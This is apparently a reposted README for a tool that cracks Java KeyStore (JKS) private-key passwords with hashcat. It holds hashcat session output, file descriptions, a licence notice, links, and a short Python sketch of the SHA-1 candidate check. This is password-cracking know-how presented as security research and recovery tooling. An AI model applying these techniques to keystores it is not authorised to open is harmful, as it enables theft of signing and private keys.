Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4014116700160/7625597484987 (52.64%)
Rejected.........: 0/4014116700160 (0.00%)
Restore.Point....: 5505024000/10460353203 (52.63%)
Candidates.#1....: NNVGFSRFO -> Z|ZFVDUFO
HWMon.Dev.#1.....: Temp: 75c Fan: 89% Util:100% Core:1936MHz Mem:4513MHz Bus:1

Started: Tue May 30 17:41:56 2017
Stopped: Tue May 30 17:50:24 2017

So from this repository you basically only need the JksPrivkPrepare.jar to run a cracking session.

Other things in this repository

test_run.sh: A little test script that you should be able to run after a couple of minutes to see this project in action. It includes comments on how to set up the dependencies for this project.
benchmarking: Tests that show why you should use this technique and not others. Please read the "Nail in the JKS coffin" article.
example_jks: Generates example JKS files.
fingerprint_creation: Every plaintext private key in PKCS#8 has its own "fingerprint" that we expect when we guess the correct password. These fingerprints are necessary to make sure we are able to detect when we guessed the correct password. Please read the "Nail in the JKS coffin" article. This folder has the code to generate these fingerprints; it's a little bit hacky, but I don't expect that it will ever be necessary to add any other fingerprints.
JksPrivkPrepare: The source code of how the JKS files are read and the hash calculated that we need to give to hashcat.
jksprivk_crack.py: A proof of concept implementation that can be used instead of hashcat. Obviously this is much slower than hashcat, but it can outperform John the Ripper (JtR) in certain cases. Please read the "Nail in the JKS coffin" article.
jksprivk_decrypt.py: A little helper script that can be used to extract a private key once the password was correctly guessed.
run_example_jks.sh: A script that runs JksPrivkPrepare.jar and jksprivk_crack.py on all example JKS files in the example_jks folder. Make sure you run the generate_examples.py script in example_jks before.

Related work and further links

A big shout-out goes to Casey Marshall, who wrote the JKS.java class, which is used in a modified version in this project:

/* JKS.java -- implementation of the "JKS" key store.
Copyright (C) 2003 Casey Marshall <rsdio@metastatic.org>

Permission to use, copy, modify, distribute, and sell this software and its documentation for any purpose is hereby granted without fee, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation. No representations are made about the suitability of this software for any purpose. It is provided "as is" without express or implied warranty.

This program was derived by reverse-engineering Sun's own implementation, using only the public API that is available in the 1.4.1 JDK. Hence nothing in this program is, or is derived from, anything copyrighted by Sun Microsystems. While the "Binary Evaluation License Agreement" that the JDK is licensed under contains blanket statements that forbid reverse-engineering (among other things), it is my position that US copyright law does not and cannot forbid reverse-engineering of software to produce a compatible implementation. There are, in fact, numerous clauses in copyright law that specifically allow reverse-engineering, and therefore I believe it is outside of Sun's power to enforce restrictions on reverse-engineering of their software, and it is irresponsible for them to claim they can. */

Various further pieces of information, which are mentioned in the article as well:

JKS is going to be replaced as the default key store type in Java 9: http://openjdk.java.net/jeps/229
https://gist.github.com/zach-klippenstein/4631307
http://www.openwall.com/lists/john-users/2015/06/07/3
https://github.com/bes/KeystoreBrute
https://github.com/jeffers102/KeystoreCracker
https://github.com/volure/keystoreBrute
https://gist.github.com/robinp/2143870
https://www.darknet.org.uk/2015/06/patator-multi-threaded-service-url-brute-forcing-tool/
https://github.com/rsertelon/android-keystore-recovery
https://github.com/MaxCamillo/android-keystore-password-recover
https://cryptosense.com/mighty-aphrodite-dark-secrets-of-the-java-keystore/
https://hashcat.net/events/p12/js-sha1exp_169.pdf
https://github.com/hashcat/hashcat

Neighborly greetings go out to atom, vollkorn, cem, doegox, corkami, xonox and rexploit for supporting this research in one form or another!

Sursa: https://github.com/floyd-fuh/JKS-private-key-cracker-hashcat
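As referenced earlier in this post, here is a toy Python sketch of the single-SHA-1 check that makes JKS private-key cracking so cheap. It follows my reading of the POC||GTFO article and the pyjks implementation; treat the details as assumptions, and note that the salt and ciphertext would come from parsing JksPrivkPrepare's output, not from values shown here.

import hashlib

def keystream_first_block(password, salt):
    # JKS key protection derives its keystream as
    # block[0] = SHA1(password_bytes + salt),
    # block[i] = SHA1(password_bytes + block[i-1]);
    # password characters are stored as two bytes each (UTF-16-BE).
    pw = password.encode("utf-16-be")
    return hashlib.sha1(pw + salt).digest()

def candidate_matches(password, salt, ct_first20):
    # XOR the first 20 ciphertext bytes with the first keystream block
    # and look for a plausible PKCS#8 prefix (a DER SEQUENCE, 0x30).
    ks = keystream_first_block(password, salt)
    plain = bytes(a ^ b for a, b in zip(ks, ct_first20))
    return plain[0] == 0x30

# salt and ct_first20 would be parsed from the $jksprivk$ hash line;
# real crackers compare against longer per-key-type fingerprints
# (see the fingerprint_creation folder) to avoid false positives.

Because one candidate password costs a single SHA-1 over a short input, the check maps perfectly onto GPU brute forcing, which is exactly what the hashcat mode -m 15500 exploits.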